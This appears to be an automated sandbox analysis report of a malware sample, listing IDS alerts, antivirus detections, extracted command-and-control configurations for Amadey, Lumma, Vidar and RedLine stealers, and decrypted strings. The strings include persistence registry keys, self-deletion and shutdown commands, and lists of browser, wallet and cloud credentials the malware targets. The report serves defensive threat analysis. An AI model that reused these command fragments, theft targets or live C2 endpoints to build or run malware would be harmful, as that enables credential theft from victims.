2025-02-13T10:35:33.667214+0100	2803305	3	Unknown Traffic	192.168.2.5	50012	185.215.113.75	80	TCP
2025-02-13T10:35:38.058887+0100	2803305	3	Unknown Traffic	192.168.2.5	50019	185.215.113.75	80	TCP
2025-02-13T10:35:43.533842+0100	2803305	3	Unknown Traffic	192.168.2.5	50021	185.215.113.75	80	TCP
2025-02-13T10:35:48.928665+0100	2803305	3	Unknown Traffic	192.168.2.5	50025	185.215.113.75	80	TCP
2025-02-13T10:35:55.829714+0100	2803305	3	Unknown Traffic	192.168.2.5	50031	185.215.113.75	80	TCP
2025-02-13T10:36:01.246103+0100	2803305	3	Unknown Traffic	192.168.2.5	50036	185.215.113.75	80	TCP
2025-02-13T10:36:08.488247+0100	2803305	3	Unknown Traffic	192.168.2.5	50044	185.215.113.75	80	TCP
2025-02-13T10:36:19.545388+0100	2803305	3	Unknown Traffic	192.168.2.5	50049	185.215.113.75	80	TCP
2025-02-13T10:36:25.092167+0100	2803305	3	Unknown Traffic	192.168.2.5	50054	185.215.113.75	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:36:23.089618+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.5	50051	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:36:28.402241+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.5	50051	103.84.89.222	33791	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:21.948408+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49995	188.114.96.3	443	TCP
2025-02-13T10:35:56.507917+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50032	172.67.155.64	443	TCP
2025-02-13T10:36:11.918577+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50046	172.67.155.64	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:59.971768+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	50034	104.102.49.254	443	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:36:23.089618+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.5	50051	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1w5RpHuliE.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://soulfulimusic.cyou/api	Avira URL Cloud: Label: malware
Source: https://mixedrecipew.biz:443/api	Avira URL Cloud: Label: malware
Source: https://mercharena.biz/apivice	Avira URL Cloud: Label: malware
Source: https://floweringtstrip.help/mi	Avira URL Cloud: Label: malware
Source: https://pleasedcfrown.biz:443/api	Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/api0	Avira URL Cloud: Label: malware
Source: https://opbafindi.com/ws	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou:443/apiicrosoft	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou/apirE	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/6691015685/Bjkm5hE.exe	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou/	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou/H:	Avira URL Cloud: Label: malware
Source: https://floweringtstrip.help/	Avira URL Cloud: Label: malware
Source: soulfulimusic.cyou	Avira URL Cloud: Label: malware
Source: https://soulfulimusic.cyou/p:N	Avira URL Cloud: Label: malware
Source: https://affordtempyo.biz:443/apid	Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/apis	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["soulfulimusic.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "vyHxTw--"}
Source: 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
Source: 31.2.ViGgA8C.exe.e10000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ViGgA8C[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Bjkm5hE[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\null[1]	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KbSwZup[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\null[2]	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xkV9ZML[1].exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\N53e5EuJZ3s\Y-Cleaner.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Source: 1w5RpHuliE.exe	Virustotal: Detection: 57%			Perma Link
Source: 1w5RpHuliE.exe	ReversingLabs: Detection: 72%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.43
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abc3bc1985
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skotes.exe
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: soulfulimusic.cyou
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: importenptoc.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: voicesharped.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: inputrreparnt.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: torpdidebar.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: rebeldettern.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: actiothreaz.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: garulouscuto.com
Source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	String decryptor: breedertremnd.com

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_0041A443 CryptUnprotectData,

10_2_0041A443

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 24.2.976cb97ff6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2947993314.0000000000413000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe

Unpacked PE file: 36.2.filebasedassist.exe.400000.0.unpack

Source: 1w5RpHuliE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Based Assistant_is1

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50072 version: TLS 1.2

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 976cb97ff6.exe, 00000018.00000003.2922018748.000000000482F000.00000004.00001000.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2947993314.0000000000410000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 976cb97ff6.exe, 00000018.00000002.2948683307.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbMZ source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: C:\Users\TOW\Desktop\TESTING CRYPTER\Dlls\LoaderDLL.pdb source: lt8kslFxQ.exe, 00000025.00000002.3403005309.00000000030F1000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbH source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Acquire.pdb source: xkV9ZML.exe, 00000007.00000002.2748577375.0000000003919000.00000004.00000800.00020000.00000000.sdmp, xkV9ZML.exe, 00000007.00000000.2592368510.0000000000532000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2951247939.0000000005053000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: BitLockerToGo.pdb source: b7b5e2e140.exe, 0000000D.00000002.3109758340.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 14b550e5e3.exe, 0000001B.00000003.3145250358.000000000E084000.00000004.00001000.00020000.00000000.sdmp, 6761aae677.exe, 0000001E.00000002.3396257355.000000000EC84000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.pdb) source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: wntdll.pdbUGP source: lt8kslFxQ.exe, 00000025.00000002.3404815208.0000000003190000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lt8kslFxQ.exe, 00000025.00000002.3404815208.0000000003190000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERCB41.tmp.dmp.21.dr
